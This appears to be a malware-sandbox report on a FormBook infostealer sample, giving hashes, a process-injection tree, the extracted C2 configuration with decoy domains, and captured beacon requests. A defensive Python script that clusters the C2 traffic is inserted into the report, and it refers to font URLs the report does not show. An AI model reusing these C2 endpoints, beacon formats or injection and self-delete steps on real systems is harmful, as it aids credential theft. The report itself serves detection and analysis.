
Windows Analysis Report TPJX2QwEdXs5sTV.exe

Overview

General Information

Sample Name: TPJX2QwEdXs5sTV.exe
Analysis ID: 483640
MD5: ce556ce97ea23cbc2940f2aad45d468f
SHA1: cc2bdaefa2f0ac108e2f456e42a42e8258580cf4
SHA256: 7c3d5ebd2c417a52b2a0b98dee95b5a7f283816f6a2453ceeffd31becc140882
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TPJX2QwEdXs5sTV.exe (PID: 5056 cmdline: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' MD5: CE556CE97EA23CBC2940F2AAD45D468F)
    • RegSvcs.exe (PID: 5192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
    • RegSvcs.exe (PID: 4036 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmd.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 4572 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.438451.com/t75f/"], "decoy": ["ice-lemon.pro", "ar3spro.cloud", "9055837.com", "fucksociety.net", "prettyofficialx.com", "mfxw.xyz", "relationshipquiz.info", "customia.xyz", "juanayjuan.com", "zidiankj.com", "facture-booking.com", "secondmining.store", "aboutyou.club", "gongxichen.com", "laurabraincreative.com", "pierrot-bros.com", "saintpaulaccountingservices.com", "dom-maya.com", "garderobamarzen.net", "la-salamandre-assurances.com", "pearmanprep.com", "telfarcontrol.com", "productsshareco.com", "cirf2021.online", "purchasevip.com", "cakewalkvision.com", "pointrenewables.com", "groups4n.com", "swnegce.xyz", "tjapro.com", "packagedesign.biz", "services-govgr.cloud", "shopgrassfedbeef.com", "tquilaint.com", "templetreemontessori.com", "munortiete.com", "nothingbutspotlesss.com", "fanpaixiu.xyz", "fr-site-amazon.com", "salartfinance.com", "beachers-shop.com", "friskvardaportalen.online", "pinsanova.site", "lemonvinyl.online", "indianadogeavaxsite.site", "styphon.com", "open24review-service.com", "bdjh9.xyz", "cocodiesel.com", "fortmyersfl.deals", "dsdtourism.com", "phone-il.net", "learningfactoryus.com", "incentreward.xyz", "travellerfund.com", "changcheng.pro", "cryptowalletts.com", "tradopplst.xyz", "autonomoustechnologyinc.com", "assessmentdna.xyz", "denicon-th.com", "dib5so.com", "genwealthbuilders.store", "delnetitcilo.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
6.2.RegSvcs.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe', ParentImage: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe, ParentProcessId: 5056, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5192
Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe', ParentImage: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe, ParentProcessId: 5056, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5192

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (the extracted configuration is the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: TPJX2QwEdXs5sTV.exe; ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match; File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY
Source: 6.2.RegSvcs.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: TPJX2QwEdXs5sTV.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: TPJX2QwEdXs5sTV.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: RegSvcs.pdb, source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.390723041.000000000105F000.00000040.00000001.sdmp, cmd.exe, 00000017.00000002.518459422.000000000369F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe, 00000017.00000002.511566191.0000000000870000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmd.exe
          Source: Binary string: RegSvcs.pdb source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 23_2_0087B89C GetFileAttributesW, GetLastError, FindFirstFileW, GetLastError, FindClose, memset, ??_V@YAXPAX@Z, FindNextFileW, SetLastError, ??_V@YAXPAX@Z, GetLastError, FindClose
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 23_2_008868BA FindFirstFileExW, GetLastError, GetProcessHeap, HeapAlloc, GetProcessHeap, HeapReAlloc, FindNextFileW, FindClose, GetLastError, FindClose
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 23_2_0088245C FindFirstFileW, FindClose, memcpy, _wcsnicmp, _wcsicmp, memmove
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 23_2_008931DC FindFirstFileW, FindNextFileW, FindClose
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 23_2_008785EA memset, FindFirstFileW, FindClose, FindFirstFileW, FindNextFileW, FindClose, ??_V@YAXPAX@Z, GetLastError, SetFileAttributesW, _wcsnicmp, GetFullPathNameW, SetLastError, GetLastError, SetFileAttributesW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then pop edi

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.ice-lemon.pro
Source: C:\Windows\explorer.exe; Domain query: www.indianadogeavaxsite.site
Source: C:\Windows\explorer.exe; Domain query: www.munortiete.com
Source: C:\Windows\explorer.exe; Domain query: www.pierrot-bros.com
Source: C:\Windows\explorer.exe; Network Connect: 54.194.41.141 80
Source: C:\Windows\explorer.exe; Network Connect: 172.67.147.111 80
Performs DNS queries to domains with low reputation
Source: DNS query: www.fanpaixiu.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.438451.com/t75f/
Source: global traffic; HTTP traffic detected: GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1 Host: www.indianadogeavaxsite.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii: (empty)
Source: global traffic; HTTP traffic detected: GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1 Host: www.munortiete.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii: (empty)
          Source: cmd.exe, 00000017.00000002.521651760.0000000003C32000.00000004.00020000.sdmpString found in binary or memory: https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLV
          Source: unknownDNS traffic detected: queries for: www.ice-lemon.pro
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.indianadogeavaxsite.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.munortiete.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.280628910.0000000001448000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
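The network rows above mix two kinds of string. The http://www.sakkal.com, sandoll.co.kr, tiro.com, urwpp.de and zhongyicts.com.cn hits are font-foundry URLs carried in embedded font metadata and are noise; the rows that matter are the three /t75f/ requests, which show the same path and the same second query value (`_hN0=5jFT8RbH3tHLZn`) being sent to unrelated domains. The following script is an added example written for this page, not part of the sandbox report or the sample: it parses those three request lines (copied from the report, with the Host header folded into the URL) plus one constructed benign request, applies a path-and-parameter heuristic that is this example's own assumption rather than the sandbox's rule, and groups the hits by (path, second parameter) so that hosts sharing both surface as one configuration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed input: the three C2 requests listed in the report above in
# "<method> <URL>" form (Host header joined onto the path; the third is the
# https URL found in cmd.exe memory, which carries only the first parameter).
OBSERVED = [
    "GET http://www.indianadogeavaxsite.site/t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn",
    "GET http://www.munortiete.com/t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn",
    "GET https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLV",
]

# Constructed benign request, to show the heuristic stays quiet on ordinary traffic.
BENIGN = [
    "GET https://www.example.com/search?q=formbook&page=2",
]

# Long, unpadded-or-padded base64/urlsafe-looking blob.
_B64ISH = re.compile(r"^[A-Za-z0-9+/_-]{40,}={0,2}$")


def parse_request(line):
    """Split '<method> <url>' into method, host, path and an ordered parameter list."""
    method, url = line.split(" ", 1)
    u = urlsplit(url)
    return {
        "method": method,
        "host": u.hostname,
        "path": u.path,
        "params": parse_qsl(u.query, keep_blank_values=True),
    }


def is_formbook_like(req):
    """Heuristic assumed by this example (not a rule from the report): a GET to a
    short single-directory path whose first parameter is a long base64-looking
    value, with at most one short second parameter."""
    if req["method"] != "GET":
        return False
    if not re.fullmatch(r"/[A-Za-z0-9]{2,8}/", req["path"]):
        return False
    params = req["params"]
    if not 1 <= len(params) <= 2:
        return False
    if not _B64ISH.match(params[0][1]):
        return False
    if len(params) == 2 and len(params[1][1]) > 32:
        return False
    return True


def campaign_pivots(lines):
    """Group matching requests by (path, second-parameter value). Different
    hosts sharing both are very likely one configuration."""
    groups = {}
    for line in lines:
        req = parse_request(line)
        if not is_formbook_like(req):
            continue
        second = req["params"][1][1] if len(req["params"]) == 2 else None
        groups.setdefault((req["path"], second), set()).add(req["host"])
    return groups


if __name__ == "__main__":
    for key, hosts in campaign_pivots(OBSERVED + BENIGN).items():
        print(key, sorted(hosts))
```

Run as a script it prints one group per (path, second parameter); the two GET lines in the report land in the same group, which is the pivot to take to DNS and proxy logs when hunting for further hosts of the same configuration.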

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: TPJX2QwEdXs5sTV.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
